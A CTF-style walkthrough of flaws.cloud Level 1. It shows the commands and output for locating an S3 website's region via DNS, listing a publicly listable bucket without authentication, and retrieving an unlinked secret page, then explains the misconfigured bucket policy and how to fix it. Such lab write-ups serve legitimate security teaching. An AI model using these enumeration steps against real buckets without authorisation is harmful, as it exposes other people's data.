flaws.cloud - Level 1

flAWS.cloud is a set of CTF-like challenges that teach you about common security issues in AWS accounts. This post is the first in a series of walkthroughs for these challenges: a short writeup on how to solve Level 1, followed by a brief explanation of the AWS misconfiguration behind the flaw and how to mitigate it. Before reading, go [here](http://flaws.cloud/) and try it yourself first! ;)

Adoption of cloud computing is rising rapidly, and studies predict it will soon surpass on-premises hosting even for enterprise workloads. Large corporations remain hesitant mostly due to security concerns, which are partly of a general nature (“uploading data to the cloud”), but also stem from the myriad cloud security failures you read about in the news every day. For example, many companies misconfigure AWS S3 bucket permissions and leave sensitive data unprotected. Indeed, given the complexity of cloud platforms such as AWS or Azure, it is very easy to get a configuration wrong and create significant security risks.

flaws.cloud is a CTF-like AWS security game teaching you about the most common misconfiguration issues encountered these days. It is brought to you by Scott Piper of summitroute, an AWS security consultant. The game is about breaking into a real AWS account by exploiting badly crafted account permissions. It has 6 levels, the first of which is described in this post. The game is highly educational and recommended for anyone hosting workloads on AWS.

How the game works

To start the game, just go to http://flaws.cloud/ and follow the instructions. The game provides hints for each level, the last of which is a link to the next level, so if you get stuck, you can always just read your way through.

Note that the game is only about misconfiguration issues, so there is no need to bring in the big guns. Moreover, AWS has an acceptable use policy that does not cover typical penetration testing activities; for security testing of that kind, you must first fill out a form to get approval. In this game, only use AWS in the “intended” way!

As a prerequisite, you should have the AWS CLI installed, as it will be needed to interact with the AWS API. Instructions for installation are here. For later levels, you should also have your own AWS account, which you can sign up for here.
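If you want to sanity-check your setup, something like the following should work (a sketch; “aws configure” is only needed once you have your own account and credentials):

 $ aws --version     # confirm the CLI is installed and on the PATH
 $ aws configure     # store credentials for your own account (used in later levels)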

Level 1

Discovering S3 and the region

The description says the level is “buckets of fun” and that we are looking for a subdomain, presumably of “flaws.cloud”. Your first reaction might be to turn to tools like amass to enumerate subdomains. But let’s stick with low-tech for now and check some basic things. To find out which IP address is behind http://flaws.cloud, we can use the command line tool “dig”:

 $ dig flaws.cloud
...
;; ANSWER SECTION:
flaws.cloud.            5       IN      A       54.231.184.239
...

This reveals “54.231.184.239” as the IP address of the server. Visiting http://54.231.184.239 in the browser redirects to the AWS S3 landing page, which suggests that flaws.cloud is hosted as a static website on S3. Doing a reverse lookup, we can find out more about this server:

 $ dig -x 54.231.184.239
...
;; ANSWER SECTION:
239.184.231.54.in-addr.arpa. 898 IN     PTR     s3-website-us-west-2.amazonaws.com.
...

The IP belongs to the domain “s3-website-us-west-2.amazonaws.com”, which means the page appears to be hosted as a static website on S3 in the region “us-west-2”, i.e., US West (Oregon). AWS is divided into regions, which are groups of data centers in different parts of the world. Most resources and products are scoped to a region, and to interact with them, you have to know that region. Check here for more info on regions.
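As an aside, if you already have credentials configured for your own account, you can ask AWS for the list of available regions yourself. A quick sketch (this one does require an authenticated account):

 $ aws ec2 describe-regions --query "Regions[].RegionName" --output text
eu-north-1  ap-south-1  ...  us-west-2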

Exploiting directory listing

Next, we could try to find out more about this page. A common misconfiguration for web servers is directory listing. For an AWS S3 static site, this could happen if unauthenticated users are granted permissions to list a bucket. This may reveal sensitive content, like the link to the next level.

To list a bucket, we have to know not only in which region it is, but also its name. According to AWS documentation, the bucket name for a static website has to be the same as the domain that is used for this site. Thus, the bucket name for flaws.cloud must be “flaws.cloud”.
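We can verify this guess before listing anything. A sketch: “head-bucket” exits successfully if the bucket exists and is accessible, and an unauthenticated HEAD request on the bucket endpoint even reveals the region via the “x-amz-bucket-region” response header:

 $ aws s3api head-bucket --bucket flaws.cloud --region us-west-2 --no-sign-request && echo exists
exists
 $ curl -sI http://flaws.cloud.s3.amazonaws.com/ | grep -i x-amz-bucket-region
x-amz-bucket-region: us-west-2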

Region and bucket name are enough to list the bucket. We use the AWS command line client for this. To make an unauthenticated request, use the flag “--no-sign-request”:

 $ aws s3api list-objects-v2 --bucket flaws.cloud --region us-west-2 --no-sign-request
{
    "Contents": [
        ...
        {
            "Key": "index.html",
            "LastModified": "2018-07-10T16:47:16.000Z",
            "ETag": "\"ddd133aef0f381cf0440d5f09648791d\"",
            "Size": 3082,
            "StorageClass": "STANDARD"
        },
        ...
        {
            "Key": "secret-dd02c7c.html",
            "LastModified": "2017-02-27T01:59:30.000Z",
            "ETag": "\"c5e83d744b4736664ac8375d4464ed4c\"",
            "Size": 1051,
            "StorageClass": "STANDARD"
        }
    ]
}

The listing returned a JSON representation of all the objects in this bucket. Among the files, we find “index.html”, which is the homepage itself. We also find “secret-dd02c7c.html”, an HTML document not linked from the main page. Making a direct request to http://flaws.cloud/secret-dd02c7c.html, we find a link to the next level.
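If you prefer to stay in the terminal, the secret file can also be downloaded unauthenticated via the CLI (a sketch):

 $ aws s3 cp s3://flaws.cloud/secret-dd02c7c.html . --region us-west-2 --no-sign-request
download: s3://flaws.cloud/secret-dd02c7c.html to ./secret-dd02c7c.html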

Alternatively, a simple browser request to http://flaws.cloud.s3.amazonaws.com/ would have been enough to get an XML listing of the objects in the bucket.
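The same works from the command line; a sketch that pulls just the object keys out of the XML listing:

 $ curl -s http://flaws.cloud.s3.amazonaws.com/ | grep -o '<Key>[^<]*</Key>'
<Key>index.html</Key>
...
<Key>secret-dd02c7c.html</Key>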

The flaw

With the level done, let’s look into what went wrong when configuring the bucket. In S3, you can specify something called a bucket policy, which is what defines who can do what with objects in this bucket and also with the bucket itself. For a static website, you have to set a policy like this:

{
  "Version":"2012-10-17",
  "Statement":[{
      "Sid":"PublicReadGetObject",
      "Effect":"Allow",
      "Principal": "*",
      "Action":["s3:GetObject"],
      "Resource":["arn:aws:s3:::flaws.cloud/*"]
    }
  ]
}

I assume you have no background in AWS policies, so let me briefly describe what the one above means. A policy (in this case) is a list of statements granting principals the right to perform actions on resources. By default, nothing is allowed, and all actions have to be whitelisted using statements. In the example, we have only a single statement, which allows anyone (principal “*”) to get objects (action “s3:GetObject”) out of the flaws.cloud S3 bucket (resource “arn:aws:s3:::flaws.cloud/*”, where the asterisk matches any object inside the bucket). Accordingly, nothing else is allowed, including listing objects.
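For reference, attaching such a policy to a bucket you own would look roughly like this (a sketch; “my-site-bucket” is a hypothetical bucket name, and “policy.json” is assumed to contain the statement above):

 $ aws s3api put-bucket-policy --bucket my-site-bucket --policy file://policy.json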

Now, the bucket “flaws.cloud” is likely configured somewhat like this:

{
  "Version":"2012-10-17",
  "Statement":[{
      "Sid":"PublicReadGetObject",
      "Effect":"Allow",
      "Principal": "*",
      "Action":["s3:GetObject"],
      "Resource":["arn:aws:s3:::flaws.cloud/*"]
  }, {
      "Sid": "PublicListBucket",
      "Effect": "Allow",
      "Principal": "*",
      "Action": ["s3:ListBucket"],
      "Resource": ["arn:aws:s3:::flaws.cloud"]
  }]
}

Here, we have added an additional statement allowing anyone to perform action “s3:ListBucket” on the flaws.cloud bucket. This was what allowed us to list all files and find the secret page.
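If you administer buckets yourself, you can audit for this and lock it down. A sketch, again with a hypothetical bucket name: “get-bucket-policy” shows the currently attached policy, and S3 Block Public Access overrides accidentally public policies:

 $ aws s3api get-bucket-policy --bucket my-private-bucket
 $ aws s3api put-public-access-block --bucket my-private-bucket \
     --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true

Note that Block Public Access would also break legitimate public website hosting, so it is meant for buckets that should stay private.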

Conclusion

IAM policies are complicated to understand and hard to get right. Swiss-army-knife services like S3 support a wide variety of use cases, among them website hosting, log file storage, powering an HDFS-like file system for big data analysis, and many more. To support all this, flexible access management is a requirement, but with that flexibility comes the danger of getting the details wrong.

In recent years, the news has been full of articles about data breaches due to S3 misconfiguration. See here for a list of breaches. This level demonstrated how easy it is for anyone on the internet to find and abuse these issues.